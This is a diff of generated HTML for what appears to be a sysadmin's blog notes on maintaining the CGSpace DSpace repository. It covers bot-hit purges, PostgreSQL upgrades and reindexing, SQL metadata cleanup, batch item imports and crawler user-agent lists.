Purging 1683 hits from AHC in statistics
Purging 1129 hits from acebookexternalhit in statistics
Purging 534 hits from Iframely in statistics
Purging 1022 hits from qbhttp in statistics
Purging 330 hits from ^got in statistics
Purging 156 hits from ^colly in statistics
Purging 38 hits from article-parser in statistics
Purging 1148 hits from SomeRandomText in statistics
Purging 3126 hits from adreview in statistics
Purging 217 hits from 1science in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 14696
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 234 hits from randint in statistics
</span></span><span style="display:flex;"><span>Purging 337 hits from Koha in statistics
</span></span><span style="display:flex;"><span>Purging 1164 hits from scalaj-http in statistics
</span></span><span style="display:flex;"><span>Purging 1528 hits from scpitspi-rs in statistics
</span></span><span style="display:flex;"><span>Purging 3050 hits from lua-resty-http in statistics
</span></span><span style="display:flex;"><span>Purging 1683 hits from AHC in statistics
</span></span><span style="display:flex;"><span>Purging 1129 hits from acebookexternalhit in statistics
</span></span><span style="display:flex;"><span>Purging 534 hits from Iframely in statistics
</span></span><span style="display:flex;"><span>Purging 1022 hits from qbhttp in statistics
</span></span><span style="display:flex;"><span>Purging 330 hits from ^got in statistics
</span></span><span style="display:flex;"><span>Purging 156 hits from ^colly in statistics
</span></span><span style="display:flex;"><span>Purging 38 hits from article-parser in statistics
</span></span><span style="display:flex;"><span>Purging 1148 hits from SomeRandomText in statistics
</span></span><span style="display:flex;"><span>Purging 3126 hits from adreview in statistics
</span></span><span style="display:flex;"><span>Purging 217 hits from 1science in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 14696
</span></span></code></pre></div><ul>
<li>I don&rsquo;t have time right now to add any of these to the COUNTER-Robots list&hellip;</li>
<li>Peter asked me to add a new item type on CGSpace: Opinion Piece</li>
<li>Map an item on CGSpace for Maria since she couldn&rsquo;t find it in the item mapper</li>
@ -476,22 +476,22 @@ Purging 217 hits from 1science in statistics
<ul>
<li>Install PostgreSQL 12 on my local dev environment to starting DSpace 6.x workflows with it:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5432:5432 -d postgres:12-alpine
$ createuser -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres --pwprompt dspacetest
$ createdb -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspacetest
$ psql -h localhost -U postgres -c <span style="color:#e6db74">&#39;ALTER USER dspacetest SUPERUSER;&#39;</span>
$ pg_restore -h localhost -U postgres -d dspacetest -O --role<span style="color:#f92672">=</span>dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
$ psql -h localhost -U postgres -c <span style="color:#e6db74">&#39;ALTER USER dspacetest NOSUPERUSER;&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5432:5432 -d postgres:12-alpine
</span></span><span style="display:flex;"><span>$ createuser -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres --pwprompt dspacetest
</span></span><span style="display:flex;"><span>$ createdb -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspacetest
</span></span><span style="display:flex;"><span>$ psql -h localhost -U postgres -c <span style="color:#e6db74">&#39;ALTER USER dspacetest SUPERUSER;&#39;</span>
</span></span><span style="display:flex;"><span>$ pg_restore -h localhost -U postgres -d dspacetest -O --role<span style="color:#f92672">=</span>dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
</span></span><span style="display:flex;"><span>$ psql -h localhost -U postgres -c <span style="color:#e6db74">&#39;ALTER USER dspacetest NOSUPERUSER;&#39;</span>
</span></span></code></pre></div><ul>
<li>Eventually I will updated DSpace Test, then CGSpace (time to start paying off some technical debt!)</li>
<li>Start a full Discovery re-index on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 292m49.263s
user 201m26.097s
sys 3m2.459s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 292m49.263s
</span></span><span style="display:flex;"><span>user 201m26.097s
</span></span><span style="display:flex;"><span>sys 3m2.459s
</span></span></code></pre></div><ul>
<li>Start a full harvest on AReS</li>
</ul>
<h2 id="2022-02-14">2022-02-14</h2>
@ -503,17 +503,17 @@ sys 3m2.459s
</li>
</ul>
<pre tabindex="0"><code>or(
isNotNull(value.match('201')),
isNotNull(value.match('203')),
isNotNull(value.match('209')),
isNotNull(value.match('209')),
isNotNull(value.match('215')),
isNotNull(value.match('220')),
isNotNull(value.match('225')),
isNotNull(value.match('226')),
isNotNull(value.match('227')),
isNotNull(value.match(&#39;201&#39;)),
isNotNull(value.match(&#39;203&#39;)),
isNotNull(value.match(&#39;209&#39;)),
isNotNull(value.match(&#39;209&#39;)),
isNotNull(value.match(&#39;215&#39;)),
isNotNull(value.match(&#39;220&#39;)),
isNotNull(value.match(&#39;225&#39;)),
isNotNull(value.match(&#39;226&#39;)),
isNotNull(value.match(&#39;227&#39;)),
...
isNotNull(value.match('396'))
isNotNull(value.match(&#39;396&#39;))
</code></pre><ul>
<li>Then I flagged all matching records and exported a CSV to use with SAFBuilder
<ul>
@ -521,15 +521,15 @@ isNotNull(value.match('396'))
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-14-tac-batch2-201to400.map
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-14-tac-batch2-201to400.map
</span></span></code></pre></div><ul>
<li>Export the next batch from OpenRefine (items with ID 401 to 700), check duplicates, and then join with the file names:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv &gt; /tmp/tac3.csv
$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-02-14-tac-batch3-401-700.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv &gt; /tmp/tac3-filenames.csv
$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv &gt; /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv &gt; /tmp/tac3.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-02-14-tac-batch3-401-700.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv &gt; /tmp/tac3-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv &gt; /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
</span></span></code></pre></div><ul>
<li>I sent these 300 items to Gaia&hellip;</li>
</ul>
<h2 id="2022-02-16">2022-02-16</h2>
@ -541,36 +541,36 @@ $ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv &
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># systemctl stop tomcat7
# pg_ctlcluster <span style="color:#ae81ff">10</span> main stop
# tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
# tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
# pg_ctlcluster <span style="color:#ae81ff">12</span> main stop
# pg_dropcluster <span style="color:#ae81ff">12</span> main
# pg_upgradecluster <span style="color:#ae81ff">10</span> main
# pg_ctlcluster <span style="color:#ae81ff">12</span> main start
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># systemctl stop tomcat7
</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">10</span> main stop
</span></span><span style="display:flex;"><span># tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
</span></span><span style="display:flex;"><span># tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">12</span> main stop
</span></span><span style="display:flex;"><span># pg_dropcluster <span style="color:#ae81ff">12</span> main
</span></span><span style="display:flex;"><span># pg_upgradecluster <span style="color:#ae81ff">10</span> main
</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">12</span> main start
</span></span></code></pre></div><ul>
<li>After that I <a href="https://adamj.eu/tech/2021/04/13/reindexing-all-tables-after-upgrading-to-postgresql-13/">re-indexed the database indexes using a query</a>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ su - postgres
$ cat /tmp/generate-reindex.sql
SELECT &#39;REINDEX TABLE CONCURRENTLY &#39; || quote_ident(relname) || &#39; /*&#39; || pg_size_pretty(pg_total_relation_size(C.oid)) || &#39;*/;&#39;
FROM pg_class C
LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
WHERE nspname = &#39;public&#39;
AND C.relkind = &#39;r&#39;
AND nspname !~ &#39;^pg_toast&#39;
ORDER BY pg_total_relation_size(C.oid) ASC;
$ psql dspace &lt; /tmp/generate-reindex.sql &gt; /tmp/reindex.sql
$ &lt;trim the extra stuff from /tmp/reindex.sql&gt;
$ psql dspace &lt; /tmp/reindex.sql
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ su - postgres
</span></span><span style="display:flex;"><span>$ cat /tmp/generate-reindex.sql
</span></span><span style="display:flex;"><span>SELECT &#39;REINDEX TABLE CONCURRENTLY &#39; || quote_ident(relname) || &#39; /*&#39; || pg_size_pretty(pg_total_relation_size(C.oid)) || &#39;*/;&#39;
</span></span><span style="display:flex;"><span>FROM pg_class C
</span></span><span style="display:flex;"><span>LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
</span></span><span style="display:flex;"><span>WHERE nspname = &#39;public&#39;
</span></span><span style="display:flex;"><span> AND C.relkind = &#39;r&#39;
</span></span><span style="display:flex;"><span> AND nspname !~ &#39;^pg_toast&#39;
</span></span><span style="display:flex;"><span>ORDER BY pg_total_relation_size(C.oid) ASC;
</span></span><span style="display:flex;"><span>$ psql dspace &lt; /tmp/generate-reindex.sql &gt; /tmp/reindex.sql
</span></span><span style="display:flex;"><span>$ &lt;trim the extra stuff from /tmp/reindex.sql&gt;
</span></span><span style="display:flex;"><span>$ psql dspace &lt; /tmp/reindex.sql
</span></span></code></pre></div><ul>
<li>I saw that the index on <code>metadatavalue</code> shrunk by about 200MB!</li>
<li>After testing a few things I dropped the old cluster:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># pg_dropcluster <span style="color:#ae81ff">10</span> main
# dpkg -l | grep postgresql-10 | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -r
</code></pre></div><h2 id="2022-02-17">2022-02-17</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># pg_dropcluster <span style="color:#ae81ff">10</span> main
</span></span><span style="display:flex;"><span># dpkg -l | grep postgresql-10 | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -r
</span></span></code></pre></div><h2 id="2022-02-17">2022-02-17</h2>
<ul>
<li>I updated my <code>migrate-fields.sh</code> script to use field names instead of IDs
<ul>
@ -582,25 +582,25 @@ $ psql dspace &lt; /tmp/reindex.sql
<ul>
<li>Normalize the <code>text_lang</code> attributes of metadata on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2838588
en | 1082
| 801
fr | 2
vn | 2
en_US. | 1
sp | 1
| 0
(8 rows)
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;en_US.&#39;, &#39;&#39;);
UPDATE 1884
dspace=# UPDATE metadatavalue SET text_lang=&#39;vi&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;vn&#39;);
UPDATE 2
dspace=# UPDATE metadatavalue SET text_lang=&#39;es&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;sp&#39;);
UPDATE 1
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
</span></span><span style="display:flex;"><span> text_lang | count
</span></span><span style="display:flex;"><span>-----------+---------
</span></span><span style="display:flex;"><span> en_US | 2838588
</span></span><span style="display:flex;"><span> en | 1082
</span></span><span style="display:flex;"><span> | 801
</span></span><span style="display:flex;"><span> fr | 2
</span></span><span style="display:flex;"><span> vn | 2
</span></span><span style="display:flex;"><span> en_US. | 1
</span></span><span style="display:flex;"><span> sp | 1
</span></span><span style="display:flex;"><span> | 0
</span></span><span style="display:flex;"><span>(8 rows)
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;en_US.&#39;, &#39;&#39;);
</span></span><span style="display:flex;"><span>UPDATE 1884
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;vi&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;vn&#39;);
</span></span><span style="display:flex;"><span>UPDATE 2
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;es&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;sp&#39;);
</span></span><span style="display:flex;"><span>UPDATE 1
</span></span></code></pre></div><ul>
<li>I then exported the entire repository and did some cleanup on DOIs
<ul>
<li>I found ~1,200 items with no <code>cg.identifier.doi</code>, but which had a DOI in their citation</li>
@ -623,8 +623,8 @@ UPDATE 1
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">abs(diff(toDate(cells[&#34;issued&#34;].value),toDate(cells[&#34;dcterms.issued[en_US]&#34;].value), &#34;days&#34;))
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>abs(diff(toDate(cells[&#34;issued&#34;].value),toDate(cells[&#34;dcterms.issued[en_US]&#34;].value), &#34;days&#34;))
</span></span></code></pre></div><ul>
<li>In <em>most</em> cases Crossref&rsquo;s dates are more correct than ours, though there are a few odd cases that I don&rsquo;t know what strategy I want to use yet</li>
<li>Start a full harvest on AReS</li>
</ul>
@ -639,26 +639,26 @@ UPDATE 1
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">or(
value.contains(&#34;10.1017&#34;),
value.contains(&#34;10.1007&#34;),
value.contains(&#34;10.1016&#34;),
value.contains(&#34;10.1098&#34;),
value.contains(&#34;10.1111&#34;),
value.contains(&#34;10.1002&#34;),
value.contains(&#34;10.1046&#34;),
value.contains(&#34;10.2135&#34;),
value.contains(&#34;10.1006&#34;),
value.contains(&#34;10.1177&#34;),
value.contains(&#34;10.1079&#34;),
value.contains(&#34;10.2298&#34;),
value.contains(&#34;10.1186&#34;),
value.contains(&#34;10.3835&#34;),
value.contains(&#34;10.1128&#34;),
value.contains(&#34;10.3732&#34;),
value.contains(&#34;10.2134&#34;)
)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>or(
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1017&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1007&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1016&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1098&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1111&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1002&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1046&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.2135&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1006&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1177&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1079&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.2298&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1186&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.3835&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1128&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.3732&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.2134&#34;)
</span></span><span style="display:flex;"><span>)
</span></span></code></pre></div><ul>
<li>Many many of Crossref&rsquo;s records are correct where we have no license, and in some cases more correct when we have a different license
<ul>
<li>I ran license updates on ~167 DOIs in the end on CGSpace</li>
@ -669,11 +669,11 @@ value.contains(&#34;10.2134&#34;)
<ul>
<li>Update some audience metadata on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_value=&#39;Academics&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;Academicians&#39;;
UPDATE 354
dspace=# UPDATE metadatavalue SET text_value=&#39;Scientists&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;SCIENTISTS&#39;;
UPDATE 2
</code></pre></div><h2 id="2022-02-25">2022-02-25</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=&#39;Academics&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;Academicians&#39;;
</span></span><span style="display:flex;"><span>UPDATE 354
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=&#39;Scientists&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;SCIENTISTS&#39;;
</span></span><span style="display:flex;"><span>UPDATE 2
</span></span></code></pre></div><h2 id="2022-02-25">2022-02-25</h2>
<ul>
<li>A few days ago Gaia sent me her notes on the third batch of TAC/ICW documents (items 401700 in the spreadsheet)
<ul>
@ -682,23 +682,23 @@ UPDATE 2
</li>
</ul>
<pre tabindex="0"><code>or(
isNotNull(value.match('405')),
isNotNull(value.match('410')),
isNotNull(value.match('412')),
isNotNull(value.match('414')),
isNotNull(value.match('419')),
isNotNull(value.match('436')),
isNotNull(value.match('448')),
isNotNull(value.match('449')),
isNotNull(value.match('450')),
isNotNull(value.match(&#39;405&#39;)),
isNotNull(value.match(&#39;410&#39;)),
isNotNull(value.match(&#39;412&#39;)),
isNotNull(value.match(&#39;414&#39;)),
isNotNull(value.match(&#39;419&#39;)),
isNotNull(value.match(&#39;436&#39;)),
isNotNull(value.match(&#39;448&#39;)),
isNotNull(value.match(&#39;449&#39;)),
isNotNull(value.match(&#39;450&#39;)),
...
isNotNull(value.match('699'))
isNotNull(value.match(&#39;699&#39;))
)
</code></pre><ul>
<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-25-tac-batch3-401to700.map
</code></pre></div><h2 id="2022-02-26">2022-02-26</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-25-tac-batch3-401to700.map
</span></span></code></pre></div><h2 id="2022-02-26">2022-02-26</h2>
<ul>
<li>Upgrade CGSpace (linode18) to Ubuntu 20.04</li>
<li>Start a full AReS harvest</li>

View File

@ -19,7 +19,7 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-03/" />
<meta property="article:published_time" content="2022-03-01T16:46:54+03:00" />
<meta property="article:modified_time" content="2022-03-01T16:46:54+03:00" />
<meta property="article:modified_time" content="2022-03-01T17:48:40+03:00" />
@ -34,7 +34,7 @@ $ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &#39;fuuu&
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -44,9 +44,9 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
"@type": "BlogPosting",
"headline": "March, 2022",
"url": "https://alanorth.github.io/cgspace-notes/2022-03/",
"wordCount": "48",
"wordCount": "349",
"datePublished": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-03-01T17:48:40+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -124,11 +124,67 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<ul>
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</code></pre></div><!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</span></span></code></pre></div><h2 id="2022-03-04">2022-03-04</h2>
<ul>
<li>Looking over the CGSpace Solr statistics from 2022-02
<ul>
<li>I see a few new bots, though once I expanded my search for user agents with &ldquo;www&rdquo; in the name I found so many more!</li>
<li>Here are some of the more prevalent or weird ones:
<ul>
<li>axios/0.21.1</li>
<li>Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)</li>
<li>Nutraspace/Nutch-1.2 (<a href="http://www.nutraspace.com">www.nutraspace.com</a>)</li>
<li>Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; <a href="mailto:webmaster@moreover.com">webmaster@moreover.com</a>)</li>
<li>Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com</li>
<li>Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)</li>
